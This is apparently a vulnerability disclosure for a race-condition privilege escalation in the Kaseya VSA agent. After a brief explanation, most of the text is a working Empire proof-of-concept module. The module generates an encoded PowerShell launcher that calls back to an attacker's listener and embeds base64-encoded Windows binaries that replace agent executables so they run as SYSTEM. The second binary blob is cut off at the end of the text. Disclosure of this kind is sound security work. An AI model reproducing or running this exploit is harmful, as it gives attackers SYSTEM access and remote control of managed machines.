Hey, The Local Privilege Escalation vulnerability was found in the Kaseya Virtual System Administrator (VSA) [1] agent "AgentMon.exe". The agent is a Windows service that periodically executes various programs with aNT AUTHORITY\SYSTEMa privileges. In the Kaseya's default configuration, Windows users who belong to the aAuthenticated Usersa group can modify files residing in the working and temporary directories e.g.: - "HKLM\SOFTWARE\Kaseya\Agent\...\TempPath" - "C:\Temp" - "C:\kworking" The list of executables that are stored in these directories and are run by the agent includes, but is not limited to: - "C:\kworking\NetUserStateAudit.exe" - "C:\kworking\KLicense.exe" - "C:\Temp\kwami.dll" The VSA agent before running the executables performs verification if the files were modified. If it detects that was the case, then it restores them to their known-good originals. However, this process was found to suffer from a Time of Check & Time of Use (TOCTOU) issue and that it is possible to win a race condition which makes it possible to run arbitrary executables with "NT AUTHORITY\SYSTEM" privileges. The PoC exploiting this vulnerability is included below. The PoC is an Empire module (https://github.com/EmpireProject/Empire) and it currently supports exploitation by replacing one of the following files: - "C:\kworking\NetUserStateAudit.exe" ($exe in PoC) - "C:\Temp\kwami.dll" ($dll in PoC) -- $ cat > kaseya.py << EOF from lib.common import helpers class Module: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'Kaseya AgentMon.exe <= 9.3.0.11 - Local Privilege Escalation', 'Author': ['Filip.Palian@pjwstk.edu.pl'], 'Description': ( 'It\'s possible to exploit TOCTOU vulnerability in Kaseya ' 'AgentMon.exe service by winning a race condition when it tries ' 'to execute binaries from its working and/or temp folder.'), 'Background': False, 'OutputExtension': None, 'OpsecSafe': False, 'Language' : 'python', 'NeedsAdmin' : False, 'MinLanguageVersion' : '2.6', 'Comments': [ 'http://kaseya.com/' ] } self.options = { 'Agent': { 'Description' : 'Agent to run on.', 'Required' : True, 'Value' : '' }, 'Listener' : { 'Description' : 'Listener to use.', 'Required' : True, 'Value' : '' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging ' \ + 'request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or' \ + 'other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:' \ + 'password) to use for request (default,' \ + 'none, or other).', 'Required' : False, 'Value' : 'default' }, 'Executable': { 'Description' : 'Name of the exacutable to replace in working' \ + 'folder (default or other).', 'Required' : False, 'Value' : 'default' }, 'Path': { 'Description' : 'Working or temp folder to use (default, work,' \ + 'temp).', 'Required' : False, 'Value' : 'default' }, } self.mainMenu = mainMenu if params: for param in params: option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self): listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] execName = self.options['Executable']['Value'] path = self.options['Path']['Value'] if not self.mainMenu.listeners.is_listener_valid(listenerName): print helpers.color("[!] Invalid listener: " + listenerName) return "" else: launcher = self.mainMenu.stagers.generate_launcher( listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds ) if launcher == "": print helpers.color("[!] Error in launcher generation.") return "" else: encLauncher = " ".join(launcher.split(" ")[1:]) script = ''' \$exe = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAAAAAAAAAAAAAAAAOAADwMLAQIcACAAAAAQAAAAgAAAcKMAAACQAAAAsAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADAAAAAEAAAAAAAAAMAQAEAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAACwAAAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAELEAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4pQAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVQWDAAAAAAAIAAAAAQAAAAAAAAAAIAAAAAAAAAAAAAAAAAAIAAAOBVUFgxAAAAAAAgAAAAkAAAABYAAAACAAAAAAAAAAAAAAAAAABAAADgVVBYMgAAAAAAEAAAALAAAAACAAAAGAAAAAAAAAAAAAAAAAAAQAAAwDMuOTEAVVBYIQ0JAgj1gi7MmnzBQeWEAABaEwAAAC4AACYCAPPt/93888ONtCYAjbwnBoPsHDHAZoE9CZLNbf9AAE1axwWMUwcBFwmIu5+cZIQkUHRoowgKoZjdrft3GYXAdErHBCQCFugEF1gL//PtvnMACwpsixWoIaPgBOTb/e5yoZxhiRAbB1yDPRgwTXRtfx/WDXuDxByWPQFJ67Rmr/vttpBBPJmBup9QRbaKCfdvu/11gA+3URi2+gs/PwYCD4VqdJu5e3eDuYQ8Dg+GXQyLkfhdhfb5u/vSD5XA6Z9EjXZf8BlACdx45OTTfYN5dDAsiejJ/e6FNn8fLKGAucdEJBAAUG47T44HCBAEFE8YBtu3db+jG6EgBIkYDL1gWyz73922wz9VTrkRVYnlV1aNVaRTiddR/u3Pfnzzq7gw5BacKcSNMRuD4PDHAMxOTs7uAMdABAYIDBB/Tk5OFBgcg+Twi+9uYYQ1h/YDjrRkoRjFI/wb/vaLWASLPVxv6xQ5ww+EFQJc6I/w77YDBv+DBInw8A+xHejAdd6hYobtu+wIMduD+AEp/oAPFoTf1hgMTTYFBPcWd9tuLCTzDoXbBxEfoVxAQ4TDGAYcHMQcH9pvQgLMDv/QbxMMHLBzbw99Hiv/FViXhKOs/XGE7lolEJIXjDVMoZD9PbjNHXTcG+yLW1sxyb8Lv6HHv4TSdCyD4fUnuY+DwP/W/m+KthCA+iB+54nLg5MJIg9Ey+vojS37Nox23y91EesZD2F3N9srfwo2GvGj2GSLHT82vvsf23QW9kXQAbgKJmYPRUXUY8DD/2kW1zAYRZCJxo0EhQTMbIXO8EWMiUqwCHUMlL/g/ihnCg+OQ5NEif6LBJ5vn/1nHxbwjXgBiTwqi02UFZmLDBV2he2eg8MTfCkiiUwowoXb/xsAOV2QdcmLVoPotHWUEeA4vd8Gq4k1ViyDsaVHyRILeT6hBmOzsw1roRQIBKFyBXa4T0t0DZujDATJhLW/S4fmSTnBCHUKbUChEUb4fxuNZfRbXl9dw9O7TaSG0g3YhQL+CJEfhOzeSRhI8oUNGWwIcBUKJyezcDg4qzGW2+Ek8SXv/YdXm3DrTUECUIkUDRVA7RBng3G2Ad4rASUYSwwIT78hMzoxfANCZJuwPhcojbavDEGY9rf0EBpsZwxYbI22HzR2JBMAkABV8Y3xrYgiGKEsMLE8x0BrvG32kDiiE7o4CZxCZIvwDkBUHDyw7X7uwsJBdAkyPf/SCGAVC25Yj7cGjMm/X1KQ7ibDZQCN4aL/cfwZIHURtlFENM5dFCiTZz3YEAcMJEBdQEB4cg/pT0BAQKHogEUY237j3Wz0uBFL/MmNYfxpUxS4wCF8KKHkU/0KVvj/EE5a6BEY94KACMgL+yVsMCUioeAQ9tE93ByNA1YHGFWLA5y9D8IwhGiJw4sVLWxgwd4IzIsuEGi+8BGB6ffgdSiJ2FvdWQjWn0NDrBTDOgdLehaPfyIgdKBrMLvMcpSVMFg/vJ7A99hHoQQwAR92rFDA2k8FEY1QnYaud4EpiRULv+nkpYZCB9l0gg8Yz4+96d2wJ2z7/3Qh1Az/FJ0P6wF1tS0Iu/SnsBazMxiJ9F7aLq7rApONuYsUhSVtp5fdI/DryZ+hHDh9BweBjbdekF9cHAvrlMYS3A/f/yWE2O+7FXAMhP1v9sJAeMmSvyQwQO395MD9Pz1O5kC7dA/30KMoHS8zRmiIj30QMUSSPbFt24tcDzMDFBAsPMUTPsuzBzDHSMaNlxvugm0OVC8PMdgznDHo4b1x9jH4MfBlF7z30qOFNG/3H1hturAZv0S4TyLr4d9bDdtIHyjlIMgJ68DJxAZbkwS2BPm0uhpmDJF5UWP47MQ/vmgsC0UIo+wCYSUBx3tF8KFjrOlxm43UN1RoaA8IKGFj0tib52W/YGU+G2ck4dg/HyTVA7wRa8N0FIYQuKggwgwAbATjI4+LVCQoq0RUK2C7CFRAEjwnP90WDwmNFHoUngIeK9Z+WHQK2wz/AnQSV4htu+p0OjgUQCI/1P2va7swnb4EOd505YsDhgIkrEHbjMMEDkApcXqvczZTKNUTS5Yy3pbck+uoZh+Na93W8DyhlEDdJ0gDUFwFzy3svlh0KdnK2UDd9xgD2a6E6boQD0QLKAgPjO39A1nQ6wbd2AGGPJ/ueiXcb1VQ8xdQZuD/kf5fuWBArECLEIPqAYP6BXcH2Bbr3oSVfEF0QF0GEGhrT12LcwYQV0y4xPrwLNryz6GkmsBAsF/swQwgMcBvANvjzwtCpLd/iG8Pip0CFh+fTttDMPjqGwUsjXokDEKzHSSUQWlFEGEx2CI/GgjlhilhxzgW0CnrDX9ufk8WGjARoI7Zgz2k/397LN2NVwSfCjnBdw6LegQDTwg5yA98YYnDgrL3j4O9OfN14igVdk+SxlYULIdhBv/5FkPYPTWNHFvB4wK+BsFg4YlGGQZbFwlf0/YDRwwQBIEUzhzzGeMIuKcdGATWcL/16BgMNW0cufyD4vt0/V5oiTbpQPS/dC7gAx3rgkXgMfxCFRT272ZkrAxBbBAVgwXYbXCZbq7EML285QsamMXtsCE0UCoEQg67H8seknyFhkcIH9BBzD09IIl0JJWwEw8wgmlSJv9CTIbFCS1EnBQNKNBLYrD/nHwUnG7RNbQQQBMeDsG5weDRi230WdLHpADO9teM3B+jjLiARQQtjxa2l2QHfqgEC59sbB974MiARYWHcIQMdX6hiPB0z3YIvowahEknvovvm8aigI0GsYPGDIH+FBtsbeoPg1e/iV2uBjlW3hgtbO1+k4g6gAWzbb038hCNnwiQxEkZZhnZNhEgCIgIWIsFOcKJVA1gQmtc3SI9D/r+xF9aixbsG/u9dwgDl1CNh1bTMtwtHmN77IlpcteLL6GEwH8a3QgWG6UML59rOx3fI9z9Fw+NpFWNPFunjTS9HQH4FoVSy+Zj2o1NzMKIwclQTCTqSsOkT1uz4jJFyJ3ojGMc4QS450XYPkXMOU8I0g/riYn2j0M+hVHhq4X/QR7yTr2xRjvXI6eKpA0p8td2e2/qidANtv9mg78Nq0jQUbcW6/7EKcoB0IlY2O0pCmaJNvcSYv+GgnxI+cButfBFUG2OE/KBz7ch6+5M/4A7SNdFtgqIA/2y0t/rvV7IAwNzGok766bbGf8aytsB8YtBxUECQCEjXBnIRLosQBMh65CQb0EgcL/dorZEPZGtwHdNPY0GgvX7VNT5PQUKheeH6gQ4A4ALm/gItnTG6Sp6LxjbAVsY+Te44VvCMPe7gHuQPZRBrj2WSISpU00jwd+TEVehrBs9xiBcFukXav/gP2YIFmzkhKQAyBhmloV7sWM4Zo9sCBzCP3XERxjRsQMMTUfrtgP2sYOfPR3xXv///0oE2fs4IHRcXz0gGLEBtrDxZxyVDNgN7g+rkB4LKIAd2GYfBD7D0AFBLyi4P8FZLPRqJPfPU9oTXa/vLWQOPe6ZKG9cd8DHA+jV0Mb/1zdNbBuXHfZ0JUMONB6LzGKy21sIJ3XbTVB83NqEXBdqP20x9iZGgl0RobQIEM90wYLbifAcw5CPrwy4gwcWlxbIG8N0Q+2Lgx24WIkDSol0sNhgZ6+hrom3I+hcS/ZDCH9hZmS+xBssRpqMoL8FGLrHix+MtJAPeyaEZUtuW48YFYP/XcFpMxeLAjnDdQrrTovX1r1QYdka7otCCD/x+y1xwlZPi0haSt0jOwg1Fxgs69FFoyhJ3XpkEevaXx7adUSQs49Aci02GHcds4agdbjED0wQnOtCjxiGCF+CPySBjWAtdiKBhet3ET7eDL3eMjkRi1iDW4VkjLkJde9MbMgWZLAJtKZYsgY5IJ7fgofNaHYXLQV9jREb5LJ2OkzXq+yI/9p9EokvA0A8gThodAbZ9rsqJoXDZoF4GAvrlAz8/haL3xI4TVp0BTEP684NNRJST0+nDNou8FOzA1I8I3IGA0IW2781uJ1EAhh0GzHJP1BoiV+40NqAA1Cl03IMg8HK8XgNf8AoOfF16JNen/+x4I4Kh/V8JDA5eEjxjRYt+Ah3C6R0C+3eSey/idiTuBMkExx73c3d9OehPA1xkBQGBRkLGi8sdGgGWRBL7XQn6EZ7MvD/RreJXoa2At3YHF7oOa3DicMUbFdY7opcMdtea5eWda/Sd2rQw51xgXWRCUruDHUtmeXsget7cFSQIbLcDqP5b0L/w3JCndrJycPC0lx2DpuwkW9t798GELBDDKMvL4AB76h5tnQOidBfG0CYsD/kH1ij3xWoNU0HNvZCJyB0ETN8iQcTdLiD6ZuelIUstoXpnm+fOxnusQsPRdAWjzHAL6cQDAFPP42QaASEZ4+AFEA+RyzT8DhAICU/jwsZ5NNyEvOfcXqh20AkCPfQjR/r8K87AkKhTvYhl3QMsSnhX+Bfw422H+aNts4dQjqABRTRhnneWFg6xVH/KRHFwYtKPLqW2YLINgYSOBBh1jUj/oL2WFjaSvAuh+vvf3WhFMDldtFlZnUHvKnqsfhfpdt/6ItwDFuBxmvwXl9ECdrLIVFQqyReo98vNgxyFYHpC4MJNAeCu93HGHfrKcEQWFky/yXgDDLIdnsH3NjUMsggg9DMyMgggwzEwLwggwwyuLSwgwwyyKigmJQMMsggjIh8OmAjg3hmAaHU2K+A4X2fT4cFFMKuwYifXYwE/A++WT8IIaAn9gsAJaOqygBhXXRDCgPAT/8A5LqRuw8CAACAF5ADyqJFXTCxFipRZaGqAP///wRsaWJnY2otMTYuZGxsAF9Kdl9SZWdpc///3f90ZXJDbGFzc2VzIy1ub3AgLXcgaGlkZGVuIC5ct7f/t2sZZXlhLnBzMQBwb3cqc2hlPC5l0UVs7XhlACggACtAte3tEvwAGQNVbms9dzT9d9+9JHJvcktfbWF0aAwoKTogJXMgaW51/9/eBSglZywGZykgIChyZXR2YWw9DArBtm+/K0FyZ3VtT3QgZG81aUOtXfZvI0RPTUFJTikecxsJt7u3b61yaXR5HVNJRxsAT3YtZmz+h21veSByYRxlOk9WRVJGTE9XtdZa2yBUhBrdNj7btda+7SB0b29FY8QJIGIZw9527nAcW2VkNFVORDV7oW1vAFRvdCYgWBogb2Z5d7ttv2duaWZpY2NjNChUI1NTJEGmsFtQinRpJVBNt0RsAJxOuwPY+IWuWTYwQVRNz3dvdrtt2zY0h3WCaeMgZv5sdZGwucLCOhRBgplWJWutsLCRaIUgW7634LYbtm0trGMpb3sgVml9dboutl1RdfN5OMNm/CXWCq3dBmJ50DOAAkW3MNlLhzNQJHRHL3zhMDV3UGggY2/zIDB44cIQ3iV4J835ZXWUa681Qybi1XcROttraJsLb/R3cxBuLtiHF9kKADNiabt6ZStoLGx8R0NDFCi+VQlk28bfjjIuMSAyMJcxADgbIKz9fDMuMDcwNR8bCMAG2VMbsgFhDEtTGVVVFgCVjKoqAkJGVQByZQ88ZRO428MCyMgA8GEDCE3TFYBi9wM0SmA0TdM0cISWqMLTuU3T0u4GYy8DPkzTNE1GWmiElmmarvsApge0A8TQ4NM0y6byBmQQHihN0zRNMj5GTlhgNE3TNGpyfIaQ0zRN05qkrrjABZH9TMwA1mTPsCmqsABgA8gOWYAAFGADMHpgKwAoYEJRWAogAKBDPkEwEUAAECZo2QV5UBcPwwGqyuKwGEAV+0BUZQCAQAAcA6qS4LKQUyBw6xFVWagAfyNqd3wDIFFpRGVsZXRlGxAliENEqGyC+AyIU04BRW7ab0fmChVHKkN1cnJlHDUgNiAyY0nbAzuAEklkFFRoBWG9IH6wZBNMYXN0RRCLbd/+DU1vZHV7SGFuZAVBEUFxbAbE6A9TdO2zvwRRdXBJbmZvIFN5c5aLvfb2bVRpbTBzRmk2CRgIzbXWfmNrQ291bw0ttLNWtl3ZaXrUTIp2FbUgniAxUDZuzASxl22qR2Wjve2xbyF0VW5on2RFeBhwL9vW2sx2HBQQBlQLbdY9Ce1pbmESEFRsc5BWYASxwtx1mj+oWLKEeg+MIj4NBZaeeF9fd/u+FZ81ZXhpdAxnWW1hb/0W3HdyZ3MOaetkdgpsY/63L7YldhANcydfYXBwX3R5cGURItzBD3VzqoTB/m13EWFjbVhuCG1zZ19ede99sGMHZm1vZDZNrG2Gua37Cm9iBWzjawaP4BYKzwVmcFEwZgh1O8OuuDVmd2AHbWG4Y0PEdsEHsGNw0gENEFvYNRIHdHIPbgfwrNCwbG1CX25XYWLwbLKugU92UGNCAJQFR8TTDehTcEqgZmwLMHVhQcj/J4ybo0wBB9zgAA8DCwECHAAYdV3XdQwqAwQTFAcQAzA2O3b2IUALAhoAASIAdW17dpAMqFwDAycaILNkwZ4rABAHBgD9FUm3YALUBYgEgAAAGNlGNIAXIIDQN2C7CwMuAXh0B8QXkMIPG9gYxJpQYC5k8wt7dthh9jDzABwne8Kzt0AYwC5yKIAFHgAGA8Pvp6weJ0AuYnNzC/ADfMm2LbCb0mBPaQPYIM/UYCR3Q2CDfd9SVAs0BHCfKieczcYOdGx3IGAnLAB0sZUbAMkAAAAa9wAJAAD/AGC+FZBAAI2+63///1eDzf/rEJCQkJCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97liAAAAigdHLOg8AXf3gD8CdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgCAAACLBwnAdDyLXwSNhDAAoAAAAfNQg8cI/5ZQoAAAlYoHRwjAdNyJ+VdI8q5V/5ZUoAAACcB0B4kDg8ME6+H/lmSgAACLrligAACNvgDw//+7ABAAAFBUagRTV//VjYefAQAAgCB/gGAof1hQVFBTV//VWI2eAPD//427GaUAAFcxwKpZSVBqAVP/0WGNRCSAagA5xHX6g+yA6chv///rGla+IHBAAPythcB0DWoDWf90JBDi+v/Q6+5ewgwAAFClQABspUAAkFNAAGylQAAAAAAAAAAAAAAAAAAAgEAAHIBAAJBTQAAgcEAAAAAAAAAAAAAYpUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfLAAAFCwAAAAAAAAAAAAAAAAAACJsAAAbLAAAAAAAAAAAAAAAAAAAJSwAAB0sAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgsAAArrAAAL6wAADOsAAA3LAAAOqwAAAAAAAA+LAAAAAAAAD+sAAAAAAAAEtFUk5FTDMyLkRMTABtc3ZjcnQuZGxsAFNIRUxMMzIuZGxsAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABFeGl0UHJvY2VzcwAAAF9pb2IAAFNoZWxsRXhlY3V0ZUEAAAAAoAAAGAAAAHIzHDU4NTw1QDVENWw1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" \$dll = "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